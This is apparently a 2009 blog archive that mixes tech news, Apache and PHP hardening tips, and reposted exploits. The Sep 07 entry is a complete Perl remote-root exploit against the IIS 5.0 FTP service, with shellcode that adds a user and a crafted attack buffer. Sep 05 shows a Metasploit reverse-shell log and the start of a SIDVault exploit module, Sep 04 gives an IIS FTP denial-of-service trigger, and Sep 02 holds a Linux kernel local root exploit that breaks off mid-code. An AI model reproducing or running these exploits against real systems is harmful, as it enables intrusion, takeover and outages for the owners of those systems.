Sep 13

As expected, Facebook is slimming down. The new "Lite" version of Facebook is available for users in the United States and India, according to TechCrunch.

The new version of the site appears to be much cleaner and simpler. It appears, at a quick glance, to be a better site for Facebook newbies or for anyone who finds the current site overwhelming or noisy. It also pushes the old-school Facebook apps off a cliff, which is just as well for the newest Facebook-connected services. Try it at lite.facebook.com.

The major visual change in Facebook Lite, compared with Facebook "Classic," is simply that most of the navigation and info pane that was on the left of the page is now gone. The user is not distracted by the mostly superfluous details that resided there. The input box is also gone, replaced by buttons (Write, Post Photos, Post Video) that pop down the actual input forms only when needed.

The new layout feels simpler and faster, almost Twitter-like.

The new Lite version of Facebook is cleaner and faster.

(Credit: Screenshot by Rafe Needleman/CNET)

Facebook "Classic" has a lot of navigational elements and more data that make the site cluttered, in comparison.

(Credit: Screenshot by Rafe Needleman/CNET)

Other tweaks that diehards might notice: the "Friends" tab in the top navigation of Facebook Classic is missing in Facebook Lite, replaced by a new "Events" link that opens up a page of invitations.

All pages on the site seem to be affected. They are simpler, easier to read, and faster. They load faster, partly due to what appears to be HTML optimization at Facebook. My profile page in Facebook Lite weighed in at 11K, compared to 44K in the Classic version. However, the smaller pages may also come courtesy of a dramatically decreased advertising load, which I doubt we can count on continuing, once Facebook Lite enters the mainstream.

I like the Lite site more than the old Facebook and am moving over to it now. Nice job, Facebook.

Sep 12

A 28-year-old Miami man who made millions breaking into computer networks and stealing credit card numbers pleaded guilty on Friday and agreed to forfeit more than $2.7 million in restitution, as well as a condo, jewelry, and a car.

Albert Gonzalez, a former federal government informant and the alleged ringleader of one of the largest known identity theft cases in U.S. history, pleaded guilty (as expected) to 19 counts of conspiracy, computer fraud, wire fraud, access device fraud, and aggravated identity theft related to theft of credit and debit card data from TJX Companies (owner of T.J. Maxx), BJ’s Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, among other retailers.

Gonzalez, along with 10 others from the U.S., Eastern Europe, and China, was accused in August 2008 of breaking into retail credit card payment systems using wardriving (searching for unsecured wireless networks while driving by with a laptop) and installing sniffer programs to capture data.

He also pleaded guilty to one count of conspiracy to commit wire fraud related to hacks into the network of the Dave & Buster’s restaurant chain. He was indicted on that charge in New York in May 2008.

Gonzalez still faces charges in New Jersey of conspiring to steal credit card numbers from Heartland Payment Systems, 7-Eleven, and supermarket chain Hannaford Brothers following an indictment handed down against him and two unnamed Russians last month.

Gonzalez and his alleged co-conspirators sold the numbers to others and encoded the data onto magnetic stripes of blank cards and used the new cards to withdraw tens of thousands of dollars at a time from ATMs, according to the indictments. They concealed and laundered their proceeds by using anonymous Internet-based currencies within the U.S. and abroad, and by channeling money through bank accounts in Eastern Europe, court documents indicate.

Under the terms of the plea agreements, Gonzalez faces up to 25 years in prison for the Boston charges and up to 20 years on the New York charges and will serve the terms concurrently. He also faces fines of at least $500,000.

As for restitution, Gonzalez has agreed to forfeit his Miami condo, a 2006 BMW 330i, a Tiffany diamond ring, Rolex watches, and more than $1 million in cash that was buried in his back yard.

Sentencing is scheduled for December 8. Gonzalez’ attorney, Rene Palomino, did not immediately respond to a request for comment.

Sep 10

Description: How to disable the HTTP TRACE method on recent Apache versions.

Most vulnerability scanners (like the popular Nessus, but commercial ones too) will complain (normally at a low threat or warning level) about the TRACE method being enabled on the web server tested.

Normally this is enabled by default, but if you want to test whether it is really enabled on your server, just telnet to the port your web server is listening on and request "TRACE / HTTP/1.0"; if you get a positive reply (a 200 that echoes your request back), TRACE is enabled on your system. The output of a server with TRACE enabled looks like:

telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
TRACE / HTTP/1.0
Host: foo
Any text entered here will be echoed back in the response    <- ENTER twice to finish
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2009 22:19:36 GMT
Server: Apache/2.2.6 (Debian) PHP/4.4.4-9 mod_ruby/1.2.6 Ruby/1.8.6(2007-06-07)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: foo
Any text entered here will be echoed back in the response
Connection closed by foreign host.

Traditionally, experts suggest disabling this with rewrite rules like:

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

(This needs to be added somewhere in your main Apache config file, outside of any vhost or directory config.)

Still, this has disadvantages, one being that mod_rewrite must be enabled on the server just for this. But for Apache versions newer than 1.3.34 on the legacy branch, and 2.0.55 or newer for Apache 2, it can be done much more easily, because there is a core directive that controls whether the TRACE method is enabled:

TraceEnable off

This needs to be added in the main server config (it is also accepted inside a <VirtualHost> block); the default is on. TraceEnable off causes Apache to return a 403 Forbidden error to the client.

After setting this and reloading the Apache config, the same server as above shows:

telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
TRACE / HTTP/1.0
Host: foo
testing...    <- ENTER twice
HTTP/1.1 403 Forbidden
Date: Wed, 20 Sep 2009 22:28:31 GMT
Server: Apache/2.2.6 (Debian) PHP/4.4.4-9 mod_ruby/1.2.6 Ruby/1.8.6(2007-06-07)
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access / on this server.</p>
<hr>
<address>Apache/2.2.6 (Debian) PHP/4.4.4-9 mod_ruby/1.2.6 Ruby/1.8.6(2007-06-07) Server at foo Port 80</address>
</body>
</html>
Connection closed by foreign host.
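As an added example (not part of the original post), the manual telnet check above as a small Python script: it sends the same TRACE request plus a canary header, and only reports TRACE as enabled when the server answers 200 with a message/http body that echoes the canary back, so the 403 that TraceEnable off produces (or a 405) counts as disabled. The sample responses embedded in it are constructed from the two sessions above, not captured from a live server.

```python
import socket

CANARY = "X-Canary: trace-check-1234"

# Constructed sample responses (not captured from a live server), modelled on the
# two telnet sessions above: TRACE enabled, and TRACE disabled via TraceEnable off.
SAMPLE_TRACE_ENABLED = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Wed, 10 Sep 2009 22:19:36 GMT\r\n"
    b"Server: Apache/2.2.6 (Debian)\r\n"
    b"Connection: close\r\n"
    b"Content-Type: message/http\r\n"
    b"\r\n"
    b"TRACE / HTTP/1.0\r\n"
    b"Host: foo\r\n"
    b"X-Canary: trace-check-1234\r\n"
)
SAMPLE_TRACE_DISABLED = (
    b"HTTP/1.1 403 Forbidden\r\n"
    b"Date: Wed, 20 Sep 2009 22:28:31 GMT\r\n"
    b"Server: Apache/2.2.6 (Debian)\r\n"
    b"Content-Length: 320\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
    b"<html><body><h1>Forbidden</h1></body></html>\r\n"
)


def build_trace_request(host: str, canary: str = CANARY) -> bytes:
    """The request typed by hand in the telnet session above, plus a canary header:
    if the canary comes back in the body, the server really echoed our request."""
    return f"TRACE / HTTP/1.0\r\nHost: {host}\r\n{canary}\r\n\r\n".encode("ascii")


def classify_trace_response(raw: bytes, canary: str = CANARY) -> dict:
    """Decide from a raw HTTP response whether TRACE is enabled.

    Enabled only when the status is 200, the body is message/http and it echoes
    the canary; a 403 (what TraceEnable off returns) or a 405 counts as disabled.
    """
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head, _, body = raw.partition(sep)
    lines = head.decode("iso-8859-1").splitlines()
    parts = lines[0].split(" ", 2) if lines else []
    status = int(parts[1]) if len(parts) >= 2 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    content_type = headers.get("content-type", "")
    echoed = canary.encode("ascii") in body
    enabled = status == 200 and content_type.startswith("message/http") and echoed
    return {"status": status, "content_type": content_type,
            "echoed": echoed, "enabled": enabled}


def check_trace(host: str, port: int = 80, timeout: float = 5.0) -> dict:
    """Probe host:port (your own server, e.g. after a config change) and classify the reply."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_trace_request(host))
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return classify_trace_response(b"".join(chunks))


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    result = check_trace(target, port)
    print("TRACE enabled" if result["enabled"] else "TRACE disabled", result)
```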

Sep 09

Google showed off video trailers inside text ads for financial analysts Wednesday.

Google sought to remind financial analysts Wednesday that despite all the attention it devotes to projects like Google Apps, staying on top of search and search advertising is what really matters.

The first in a series of investor Webcasts was held Wednesday by Google CFO Patrick Pichette and several other executives, and while the company did not unearth any ground-breaking shifts in strategy or new products, it did cast a spotlight on some recent improvements that the company believes have enhanced the search experience. Perhaps the most notable was the recent addition of video ads directly below text ads on the top or right-hand side of the search results page, which can be played directly on that page.

This started to emerge for some users last week according to ReelSEO, but Google is now offering advertisers a chance to insert a video trailer into their text ads. "In many cases, the best information is video," said Nick Fox, business product management director on Google’s AdWords team.

For example, Fox demonstrated how Electronic Arts is using a video trailer inside an ad for the new Tiger Woods video game. The result is a marriage of the text ad format that Google has used to rise into a dominant Internet company with the display ad style that others, such as Yahoo, are hoping to finally make a success.

"Google hasn’t made many changes to its text ad format and now sees this as a big opportunity," wrote J.P. Morgan’s Imran Khan in a research note distributed after the Webcast. It can charge either by the click through to the advertiser’s Web site or by the play of the video, therefore adding a revenue stream that didn’t exist before.

Sep 08
Magic Quotes:

What are Magic Quotes:

Magic Quotes is a process that automagically escapes incoming data to the PHP script. It’s preferred to code with magic quotes off and to instead escape the data at runtime, as needed.

Why did we use Magic Quotes:

There is no reason to use magic quotes because they are no longer a supported part of PHP. However, they did exist and did help a few beginners blissfully and unknowingly write better (more secure) code. But when dealing with code that relies upon this behavior, it's better to update the code instead of turning magic quotes on. So why did this feature exist? Simply, to help prevent SQL injection. Today developers are better aware of security and end up using database-specific escaping mechanisms and/or prepared statements instead of relying upon features like magic quotes.

Why not to use Magic Quotes:

  • Portability: Assuming it to be on, or off, affects portability. Use get_magic_quotes_gpc() to check for this, and code accordingly.
  • Performance: Because not every piece of escaped data is inserted into a database, there is a performance loss for escaping all this data. Simply calling the escaping functions (like addslashes()) at runtime is more efficient. Although php.ini-dist enables these directives by default, php.ini-recommended disables them. This recommendation is mainly for performance reasons.
  • Inconvenience: Because not all data needs escaping, it's often annoying to see escaped data where it shouldn't be. For example, emailing from a form and seeing a bunch of \' within the email. Fixing this may require excessive use of stripslashes().

Disabling Magic Quotes:

The magic_quotes_gpc directive may only be disabled at the system level, and not at runtime. In other words, use of ini_set() is not an option.

Example #1 Disabling magic quotes server side

An example that sets the value of these directives to Off in php.ini. For additional details, read the manual section titled How to change configuration settings.

; Magic quotes
;
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off

; Magic quotes for runtime-generated data, e.g. data from SQL, from exec(), etc.
magic_quotes_runtime = Off

; Use Sybase-style magic quotes (escape ' with '' instead of \').
magic_quotes_sybase = Off

If access to the server configuration is unavailable, use of .htaccess is also an option. For example:

php_flag magic_quotes_gpc Off

In the interest of writing portable code (code that works in any environment), for when setting it at the server level is not possible, here's an example that undoes magic_quotes_gpc at runtime. This method is inefficient, so it's preferred to instead set the appropriate directives elsewhere.

Example #2 Disabling magic quotes at runtime

<?php
// Only strip slashes when magic_quotes_gpc actually added them; otherwise
// legitimate backslashes in the input would be removed.
if (get_magic_quotes_gpc()) {
    // Recursively undo addslashes() on strings and on nested arrays.
    function stripslashes_deep($value)
    {
        $value = is_array($value) ?
                    array_map('stripslashes_deep', $value) :
                    stripslashes($value);

        return $value;
    }

    $_POST    = array_map('stripslashes_deep', $_POST);
    $_GET     = array_map('stripslashes_deep', $_GET);
    $_COOKIE  = array_map('stripslashes_deep', $_COOKIE);
    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
?>
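As an added example (not from the PHP manual text above, and in Python rather than PHP so it runs stand-alone), here is a model of what magic_quotes_gpc does to incoming data and why the advice above holds. The addslashes()/stripslashes() emulations (php_addslashes, php_stripslashes) and the nested walk (apply_deep, the counterpart of stripslashes_deep()) are hypothetical helpers of my own; the parameterized query at the end is the prepared-statement approach the text recommends, under which no escaping on input is needed at all.

```python
import sqlite3

# Constructed sample form submission (what $_POST might contain), with a quote,
# a backslash and a nested field so the effect of escaping is visible.
SAMPLE_POST = {
    "name": "O'Brien",
    "note": 'He said "hi" and left a \\ backslash',
    "tags": ["rock'n'roll", "jazz"],
}


def php_addslashes(value: str) -> str:
    """Hypothetical model of PHP's addslashes(): a backslash before ' " \\ and NUL."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def php_stripslashes(value: str) -> str:
    """Hypothetical model of PHP's stripslashes(): undo one addslashes() layer."""
    out = []
    i = 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            nxt = value[i + 1]
            out.append("\0" if nxt == "0" else nxt)
            i += 2
        elif value[i] == "\\":
            i += 1  # a trailing lone backslash is dropped, as PHP does
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def apply_deep(func, value):
    """Apply func to every string in a nested dict/list: magic_quotes_gpc does this
    to $_GET/$_POST/$_COOKIE on the way in, and stripslashes_deep() does it to undo."""
    if isinstance(value, dict):
        return {k: apply_deep(func, v) for k, v in value.items()}
    if isinstance(value, list):
        return [apply_deep(func, v) for v in value]
    return func(value) if isinstance(value, str) else value


def simulate_request(post: dict, magic_quotes_gpc: bool) -> dict:
    """What the PHP script sees in $_POST, depending on the magic_quotes_gpc setting."""
    return apply_deep(php_addslashes, post) if magic_quotes_gpc else post


def undo_magic_quotes(post: dict) -> dict:
    """Counterpart of the stripslashes_deep() idiom shown on the page."""
    return apply_deep(php_stripslashes, post)


def store_name(name: str) -> str:
    """Insert with a parameterized query (the data never touches the SQL text)
    and return what the database actually holds."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE people(name TEXT)")
    conn.execute("INSERT INTO people(name) VALUES (?)", (name,))
    return conn.execute("SELECT name FROM people").fetchone()[0]


def stored_value(magic_quotes_gpc: bool, strip_on_input: bool) -> str:
    """Run the whole path for SAMPLE_POST['name'] under one configuration."""
    post = simulate_request(SAMPLE_POST, magic_quotes_gpc)
    if magic_quotes_gpc and strip_on_input:
        post = undo_magic_quotes(post)
    return store_name(post["name"])


if __name__ == "__main__":
    print("magic quotes off, parameters :", stored_value(False, False))  # O'Brien
    print("magic quotes on, no strip    :", stored_value(True, False))   # O\'Brien (mangled)
    print("magic quotes on, deep strip  :", stored_value(True, True))    # O'Brien
```

The middle case is the "\' within the email" problem from the list above: with magic quotes on, the data arrives already mangled, and a parameterized query faithfully stores the mangled value.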

Sep 07

    # IIS 5.0 FTPd / Remote r00t exploit
    # Win2k SP4 targets
    # bug found & exploited by Kingcope, kcope2<at>googlemail.com
    # Affects IIS6 with stack cookie protection
    # August 2009 – KEEP THIS 0DAY PRIV8
    use IO::Socket;
    $|=1;
    #metasploit shellcode, adduser "winown:nwoniw"
    $sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
    "\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
    "\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
    "\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
    "\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
    "\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
    "\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
    "\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
    "\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
    "\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
    "\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
    "\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
    "\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
    "\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
    "\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
    "\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
    "\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
    "\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
    "\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
    "\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
    "\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
    "\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
    "\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
    "\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
    "\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
    "\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
    "\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
    "\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
    "\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
    "\x51\x54\x43\x30\x41\x41";
    #1ca
    print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
    if ($#ARGV ne 1) {
    print "usage: iiz5.pl <target> <your local ip>\n";
    exit(0);
    }
    srand(time());
    $port = int(rand(31337-1022)) + 1025;
    $locip = $ARGV[1];
    $locip =~ s/\./,/gi;
    if (fork()) {
    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                  PeerPort => '21',
                                  Proto    => 'tcp');
    $patch = "\x7E\xF1\xFA\x7F";
    #$retaddr = "ZZZZ";
    $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
    $v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
    # top address of stack frame where shellcode resides, is hardcoded inside this block
    $findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
       ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
    # attack buffer
    $c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
       ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
       "HHHHIIII".
    $patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
    $x = <$sock>;
    print $x;                            
    print $sock "USER anonymous\r\n";
    $x = <$sock>;
    print $x;
    print $sock "PASS anonymous\r\n";
    $x = <$sock>;
    print $x;
    print $sock "MKD w00t$port\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "SITE $v\r\n";
    $x = <$sock>;
    print $x;
    print $sock "CWD w00t$port\r\n";
    $x = <$sock>;
    print $x;
    print $sock "MKD CCC". "$c\r\n";
    $x = <$sock>;
    print $x;
    print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
    $x = <$sock>;
    print $x;
    # TRIGGER
    print $sock "NLST $c*/../C*/\r\n";
    $x = <$sock>;
    print $x;
    while (1) {}
    } else {
    my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
    die "Could not create socket: $!\n" unless $servsock;
    my $new_sock = $servsock->accept();
    while(<$new_sock>) {
    print $_;
    }
    close($servsock);
    }
    #Cheerio,
    #
    #Kingcope

Sep 06

I know there are some people who have not slept for fear that Google had finally committed itself to some alien culture.

Well, some outerworldly alien culture. Well, some outerworldly alien culture where all beings were green and no one used phrases like "market segmentation" and "41 shades of blue."

You see, a mysterious doodle appeared on the Google home page. It showed an alien spacecraft making off with the second "O" in the word "Google."

Were we really expected to merely gogle now? Didn't that sound uncomfortably close to ogling?

Though there were no references to the Church of Scientology, Google's first pronouncement on the subject did not quell the concern.

The questionably benign company declared: "We consider the second 'o' critical to user recognition of our brand and pronunciation of our name. We are actively looking into the mysterious tweet that has appeared on the Google twitter stream and the disappearance of the 'o' on the Google home page. We hope to have an update in the coming weeks."

The world continued experiencing the occasional shudder, until Google's Twitter page produced this revelatory tweet on Friday: "1.12.12 25.15.21.18 15 1.18.5 2.5.12.15.14.7 20.15 21.19."

Well, it was revelatory to those who think in a certain way, one to which I can only aspire.

"Yes, of course," those who think that way said to themselves, while simultaneously slapping their heads with a fly-swatter. "It's a reference to that wonderful Japanese video game of the 1980s, Zero Wing."

Now, look, I've heard of Vera Wang. But somehow Zero Wing passed me by, though I think it would be an excellent name for a fashion designer.

However, those on the inside (of the spacecraft) tell me that Zero Wing is terribly cool and features extremely characteristic English translations.

Apparently, Cats, a villain even greater than the Andrew Lloyd Webber musical, makes this declaration at the beginning of Zero Wing: "How are you gentlemen. All your base are belong to us."

Well, when you take all those numbers in the Google tweet and turn them into the corresponding letters of the alphabet, you get: "All your O are belong to us."

Why would some Googlies want to feature Zero Wing now? Well, it's the game's 20th anniversary.

So there. The problem is solved. The world is safe. Google has not been taken over by aliens.

Or can we really be sure of that?

Sep 05

    #--attack-log--
    #attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
    #[*] Please wait while we load the module tree...
    #[*] Handler binding to LHOST 0.0.0.0
    #[*] Started reverse handler
    #[*] Sending stage (718336 bytes)
    #[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)

    #meterpreter >

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote

        include Msf::Exploit::Remote::Tcp

        def initialize(info = {})
            super(update_info(info,   
                'Name'           => 'SIDVault 2.0e Windows Remote Buffer Overflow',
                'Description'    => %q{
                    This exploits a buffer overflow in the LDAP service that is
                    part of the SIDVault product. This module was tested against
                    version 2.0e.
                },
                'Author'         => [ 'His0k4 <his0k4.hlm[at]gmail.com>' ],
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision$',
                'References'     =>
                    [
                        [ 'URL', '

Sep 04

***** MS IIS FTPD DoS ZER0DAY *****

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.

Example session where the anonymous user has read access to the folder "pub":

C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"

p*/../pub:
pub

p*/../pub:
pub

p*/../pub:
pub

p*/../pub:
pub

Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed the connection)
ftp>
ftp>

By looking into my debugging session with OllyDbg I see that an exception is raised and the ftp service crashes due to a "stack overflow", which is a stack exhaustion. If the ftp service is set to "manual" startup in the services control manager, the service needs to be restarted manually.
IIS 5.0 and 6.0 were tested and are affected.

Best Regards,

Nikolaos Rangos

Sep 02

    /***********************************************************
    * hoagie_udp_sendmsg.c
    * LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) – CVE-2009-2698
    *
    * udp_sendmsg bug exploit via (*output) callback function
    * used in dst_entry / rtable
    *
    * Bug reported by Tavis Ormandy and Julien Tinnes
    * of the Google Security Team
    *
    * Tested with Debian Etch (r0)
    *
    * $ cat /etc/debian_version
    * 4.0
    * $ uname -a
    * Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
    * $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
    * $ ./hoagie_udp_sendmsg
    * hoagie_udp_sendmsg.c – linux root < 2.6.19 local
    * -andi / void.at
    *
    * sh-3.1# id
    * uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
    * sh-3.1#
    *
    * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
    * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
    * DAMAGE DONE USING THIS PROGRAM.
    *
    * VOID.AT Security
    * andi@void.at
    * http://www.void.at
    *
    ************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <errno.h>
    #include <unistd.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <sys/socket.h>
    #include <sys/mman.h>

    /**
    * this code will be called from NF_HOOK via (*output) callback in kernel mode
    */
    void set_current_task_uids_gids_to_zero() {
       asm("push %eax\n"
           "movl $0xffffe000, %eax\n"
           "andl %esp, %eax\n"
           "movl (%eax), %eax\n"
           "movl $0x0, 0x150(%eax)\n"
           "movl $0x0, 0x154(%eax)\n"
           "movl $0x0, 0x158(%eax)\n"
           "movl $0x0, 0x15a(%eax)\n"
           "movl $0x0, 0x160(%eax)\n"
           "movl $0x0, 0x164(%eax)\n"
           "movl $0x0, 0x168(%eax)\n"
           "movl $0x0, 0x16a(%eax)\n"
           "pop  %eax\n");
    }

    int main(int argc, char **argv) {
       int s;
       struct msghdr header;
       struct sockaddr_in sin;
       char *rtable = NULL;

       fprintf(stderr,
               "hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n"
                      "-andi / void.at\n\n");

       s = socket(PF_INET, SOCK_DGRAM, 0);
       if (s == -1) {
          fprintf(stderr, "[*] can't create socket\n");
          exit(-1);
       }

       /**
        * initialize required variables
        */
       memset(&header, 0, sizeof(struct msghdr));
       memset(&sin, 0, sizeof(struct sockaddr_in));
       sin.sin_family = AF_INET;
       sin.sin_addr.s_addr = inet_addr("127.0.0.1");
       sin.sin_port = htons(22);
       header.msg_name = &sin;
       header.msg_namelen = sizeof(sin);

       /**
        * and this is the trick:
        * we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0x74)
        * so we map our rtable buffer at offset 0 and set output callback function
        *
        * struct dst_entry
        * {
        *         struct dst_entry        *next;
        *         atomic_t                __refcnt;       client references
        *         int                     __use;
        *         struct dst_entry        *child;
        *         struct net_device       *dev;
        *         short                   error;
        *         short                   obsolete;
        *         int                     flags;
        * #define DST_HOST                1
        * #define DST_NOXFRM              2
        * #define DST_NOPOLICY            4
        * #define DST_NOHASH              8
        * #define DST_BALANCED            0x10
        *         unsigned long           lastuse;
        *         unsigned long           expires;
        *
        *         unsigned short          header_len;     * more space at head required *
        *         unsigned short          trailer_len;    * space to reserve at tail *
        *
        *         u32                     metrics[RTAX_MAX];
        *         struct dst_entry        *path;
        *
        *         unsigned long           rate_last;      * rate limiting for ICMP *
        *         unsigned long           rate_tokens;
        *
        *         struct neighbour        *neighbour;
        *         struct hh_cache         *hh;
        *         struct xfrm_state       *xfrm;
        *
        *         int                     (*input)(struct sk_buff*);
        *         int                     (*output)(struct sk_buff*);
        *
        * #ifdef CONFIG_NET_CLS_ROUTE
        *         __u32                   tclassid;
        * #endif
        *
        *         struct  dst_ops         *ops;
        *         struct rcu_head         rcu_head;
        *
        *         char                    info[0];
        * };
        *
        * struct rtable
        * {
        *         union
        *         {
        *                 struct dst_entry        dst;
        *                 struct rtable           *rt_next;
        *         } u;
        *
        *         struct in_device        *idev;
        *
        *         unsigned                rt_flags;
        *         __u16                   rt_type;
        *         __u16                   rt_multipath_alg;
        *
        *         __be32                  rt_dst; * Path destination     *
        *         __be32                  rt_src; * Path source          *
        *         int                     rt_iif;
        *
        *         * Info on neighbour *
        *         __be32                  rt_gateway;
        *
        *         * Cache lookup keys *
        *         struct flowi            fl;
        *
        *         * Miscellaneous cached information *
        *          __be32                  rt_spec_dst; * RFC1122 specific destination *
        *         struct inet_peer        *peer; * long-living peer info *
        * };
        *
        */
       rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
       if (rtable == MAP_FAILED) {
          fprintf(stderr, "[*] mmap failed\n");
